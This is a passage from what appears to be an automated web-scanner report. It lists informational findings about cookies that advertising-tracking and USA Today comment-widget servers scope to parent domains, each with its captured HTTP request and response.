GET /server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pf=UzQBb_qiX6nr0FKOSBMrL4loZQajlZS6rkFepl0bgHZzsYisygncD_G3QSholkobwYgDN2QBUCNB-f2MyAu5Iq-zuOwmX-HrTHP_QKh0DDi99zZmaeAXB5JqUWuVeu3CdB8okOrIsD5nHq-_Oy6eE6ZJ2sUtm5dhlmrTisFEH-Qb_3kXOMU75B8jogKvtULEAuR9LhkZd1Pd-Bo72tCNnWkHYZEnMGWwdeg40WMiAMgzcOT8yL0M8Y7JHcobYaY7CrcYIpvJPvJ4qVS8lVf1VA4PrJv2xfxYYZ31k7BT2Jc; uid=4325897289836481830; rrs=1; rds=15110; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:22:28 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:22:27 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=4447746261978249819&fpid=4&nu=n&t=
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=786652/size=728090/u=2/bnum=71920917/hr=20/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Ftravel.usatoday.com%252Fcruises%252Fpost%252F2011%252F05%252Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%252F169725%252F1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=JvH0NFJwHsb0FtfqHjQCiZITi+CCeziRcB; domain=advertising.com; expires=Wed, 15-May-2013 01:20:10 GMT; path=/
F1=Bk8eQ3EBAAAABAAAAEBACCA; domain=advertising.com; expires=Wed, 15-May-2013 01:20:10 GMT; path=/
BASE=x7Q9Mi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqiTY9EZTN3JW20eLPdrgh1P5SsSr6+LbSM!; domain=advertising.com; expires=Wed, 15-May-2013 01:20:10 GMT; path=/
ROLL=U6APIjeKkzEWubpE6Al2BE2iZmDmLrCs2nFCCpOodIr/p+YO855CAlIH6FkTqWZ8dl6Dt86qJxfhU88uP3KlkcN!; domain=advertising.com; expires=Wed, 15-May-2013 01:20:10 GMT; path=/
71920917=_4dd07bc9,3027560310,786652^1007584^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=786652/size=728090/u=2/bnum=71920917/hr=20/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Ftravel.usatoday.com%252Fcruises%252Fpost%252F2011%252F05%252Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%252F169725%252F1 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=29B0NFJwIsb0F7QqHjQCiZAYi+CCezixvB; F1=BY3HQ3EBAAAABAAAAABAeEA; BASE=x7Q9Mi23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqiTY9EZTN3JW20eLPdrgh1P5SsSr6+LbSM!; ROLL=U6APSje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49wJCPtHdWluzNpOTwuc9H5GWMuk/lQ81tYf50ZFTFJ!

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 01:20:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1007584.786652.0XMC
Set-Cookie: C2=JvH0NFJwHsb0FtfqHjQCiZITi+CCeziRcB; domain=advertising.com; expires=Wed, 15-May-2013 01:20:10 GMT; path=/
Set-Cookie: F1=Bk8eQ3EBAAAABAAAAEBACCA; domain=advertising.com; expires=Wed, 15-May-2013 01:20:10 GMT; path=/
Set-Cookie: BASE=x7Q9Mi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqiTY9EZTN3JW20eLPdrgh1P5SsSr6+LbSM!; domain=advertising.com; expires=Wed, 15-May-2013 01:20:10 GMT; path=/
Set-Cookie: ROLL=U6APIjeKkzEWubpE6Al2BE2iZmDmLrCs2nFCCpOodIr/p+YO855CAlIH6FkTqWZ8dl6Dt86qJxfhU88uP3KlkcN!; domain=advertising.com; expires=Wed, 15-May-2013 01:20:10 GMT; path=/
Set-Cookie: 71920917=_4dd07bc9,3027560310,786652^1007584^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 16 May 2011 01:20:10 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000786652/mnum
...[SNIP]...

15.67. http://segment-pixel.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

segments_p1="eJzjYuGYNZmRi4VjzlsQuWMdIxczx2IBIPPmBWYgsysTyNzynwkAuF4Jvw==";Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 15-May-2012 01:42:56 GMT;Max-Age=31536000

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=2083&partnerID=31&clientID=177&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=f034cbc4-3674-4d22-be3a-aac76e8e10cb; exchange_uid="eyI0IjogWyJDQUVTRUJMNlFmRmRPWkJGdXdLdHI0bVhjeWMiLCA3MzQyNzJdfQ=="; uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; subID="{}"; impressions="{\"594387\": [1305508826+ \"c76fa991-e8e9-36fa-8db6-64674e41b1c5\"+ 3236+ 40464+ 620]}"; camp_freq_p1=eJzjkuGYtZFVgFHi1veD71gUGDVuPbj4jsWA0QLMBwCrhwzf; io_freq_p1="eJzjEuboDhdglLj1/eA7FgNGCzANAExgCKI="; dp_rec="{\"2\": 1305508826}"; segments_p1="eJzjYuGYNZmRi4VjzlsQuWMdiLx5gRlIbvnPxMXM0ZUJAJZHCPc="

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 01:42:56 GMT
Set-Cookie: segments_p1="eJzjYuGYNZmRi4VjzlsQuWMdIxczx2IBIPPmBWYgsysTyNzynwkAuF4Jvw==";Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 15-May-2012 01:42:56 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=492837&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)

15.68. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Stats/Tracker.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Stats/Tracker.gif?plckUrl=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&plckUserId=null&plckGcid=Pluck4&plckCurrentTime=1305508825987 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SiteLifeHost=gnvm6l3pluckcom; anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; usatprod=R1449728009; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Content-Encoding: deflate
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm4l3pluckcom
Set-Cookie: SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 16 May 2011 01:28:20 GMT
Connection: close

15.69. http://sitelife.usatoday.com/ver1.0/USAT/pluck/comments/comments.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/USAT/pluck/comments/comments.css

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SiteLifeHost=gnvm6l3pluckcom; domain=usatoday.com; path=/
anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; domain=usatoday.com; expires=Tue, 15-May-2012 01:19:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/USAT/pluck/comments/comments.css HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449798794; path=/
Cache-Control: private
Content-Length: 30408
Content-Type: text/css
Last-Modified: Sun, 15 May 2011 08:31:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm6l3pluckcom
Set-Cookie: SiteLifeHost=gnvm6l3pluckcom; domain=usatoday.com; path=/
Set-Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; domain=usatoday.com; expires=Tue, 15-May-2012 01:19:47 GMT; path=/
Date: Mon, 16 May 2011 01:19:46 GMT
Connection: close

/*********************************
*
* CSS control - DO NOT CHANGE OR REMOVE
* needed to track loading of this css file
*
*********************************/

.pluck-comments-css-loaded { /
...[SNIP]...

15.70. http://sitelife.usatoday.com/ver1.0/USAT/pluck/pluck.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/USAT/pluck/pluck.css

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
anonId=ea7d33cf-ffc2-4016-bb89-ca8daec41de3; domain=usatoday.com; expires=Tue, 15-May-2012 01:19:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/USAT/pluck/pluck.css HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Cache-Control: private
Content-Length: 34563
Content-Type: text/css
Last-Modified: Sun, 15 May 2011 08:27:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Set-Cookie: anonId=ea7d33cf-ffc2-4016-bb89-ca8daec41de3; domain=usatoday.com; expires=Tue, 15-May-2012 01:19:47 GMT; path=/
Date: Mon, 16 May 2011 01:19:46 GMT
Connection: close

/*********************************
*
* CSS control - DO NOT CHANGE OR REMOVE
* needed to track loading of this css file
*
*********************************/

.pluck-css-loaded { /* DO NOT
...[SNIP]...

15.71. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/sys/jsonp.app

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=169725.blog&clientUrl=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; USATINFO=Handle%3D; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Cache-Control: private
Content-Length: 89538
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm4l3pluckcom
Set-Cookie: SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 16 May 2011 01:29:50 GMT
Connection: close

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...

15.72. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/usat/pluck/comments/comments.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/usat/pluck/comments/comments.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Cache-Control: private
Content-Length: 37055
Content-Type: application/x-javascript
Last-Modified: Sun, 15 May 2011 08:42:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm4l3pluckcom
Set-Cookie: SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 16 May 2011 01:20:44 GMT
Connection: close

// Plugin to contain scripts frequently used across multiple widgets
// Minipersona, report abuse, that sort of thing.
pluckAppProxy.registerPlugin("pluck/comments/comments.js",
// init function, c
...[SNIP]...

15.73. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/usat/pluck/pluck.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/usat/pluck/pluck.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Cache-Control: private
Content-Length: 53489
Content-Type: application/x-javascript
Last-Modified: Sun, 15 May 2011 08:42:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm4l3pluckcom
Set-Cookie: SiteLifeHost=gnvm4l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 16 May 2011 01:20:35 GMT
Connection: close

// Plugin to contain scripts frequently used across multiple widgets
// Minipersona, report abuse, that sort of thing.

pluckAppProxy.registerPlugin("pluck/pluck.js",
// init function, called fir
...[SNIP]...

15.74. http://sync.mathtag.com/sync/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ts=1305509185; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:26:25 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync/img?mt_exid=11&type=sync&redir=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D530739%26ev%3D%5BMM_UUID%5D HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530; ts=1305508808

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x1 pid 0x1c72 7282
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 16 May 2011 01:26:25 GMT
Location: http://bh.contextweb.com/bh/rtset?do=add&pid=530739&ev=4dd07bc8-e97b-118c-3dec-7b8c5c306530
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
Connection: Keep-Alive
Set-Cookie: ts=1305509185; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:26:25 GMT
Content-Length: 0

15.75. http://t.invitemedia.com/track_imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t.invitemedia.com
Path:	/track_imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

impressions="{\"594387\": [1305509218+ \"c76fa991-e8e9-36fa-8db6-64674e41b1c5\"+ 3236+ 40464+ 620]}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 01:26:58 GMT; Path=/
camp_freq_p1="eJzjkuGYtZFVgEni0a+D71gUmDRuPbj4jsWAyeLWdyAfAKyYDO0="; Domain=invitemedia.com; expires=Tue, 15-May-2012 01:26:58 GMT; Path=/
io_freq_p1="eJzjEufoDhdgknj06+A7FgUGDQYDJotb34FsAGN2CPs="; Domain=invitemedia.com; expires=Tue, 15-May-2012 01:26:58 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track_imp?partnerID=9&campID=88218&crID=111371&auctionID=13055088161565884-111371&cost=0.3445&pubICode=1725912&pub=363112&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml HTTP/1.1
Host: t.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exchange_uid="eyI0IjogWyJDQUVTRUJMNlFmRmRPWkJGdXdLdHI0bVhjeWMiLCA3MzQyNzJdfQ=="; uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; segments_p1="eJzjYuGYNZmRi4VjxzoQueU/ExczR1cmADyqBZU="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 01:26:58 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 16-May-2011 01:26:38 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 01:26:58 GMT; Path=/
Set-Cookie: impressions="{\"594387\": [1305509218+ \"c76fa991-e8e9-36fa-8db6-64674e41b1c5\"+ 3236+ 40464+ 620]}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 01:26:58 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuGYtZFVgEni0a+D71gUmDRuPbj4jsWAyeLWdyAfAKyYDO0="; Domain=invitemedia.com; expires=Tue, 15-May-2012 01:26:58 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjEufoDhdgknj06+A7FgUGDQYDJotb34FsAGN2CPs="; Domain=invitemedia.com; expires=Tue, 15-May-2012 01:26:58 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

15.76. http://tag.contextweb.com/TagPublish/getad.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getad.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

V=8vciuQJMXXJY; domain=.contextweb.com; expires=Wed, 16-May-2012 01:20:42 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

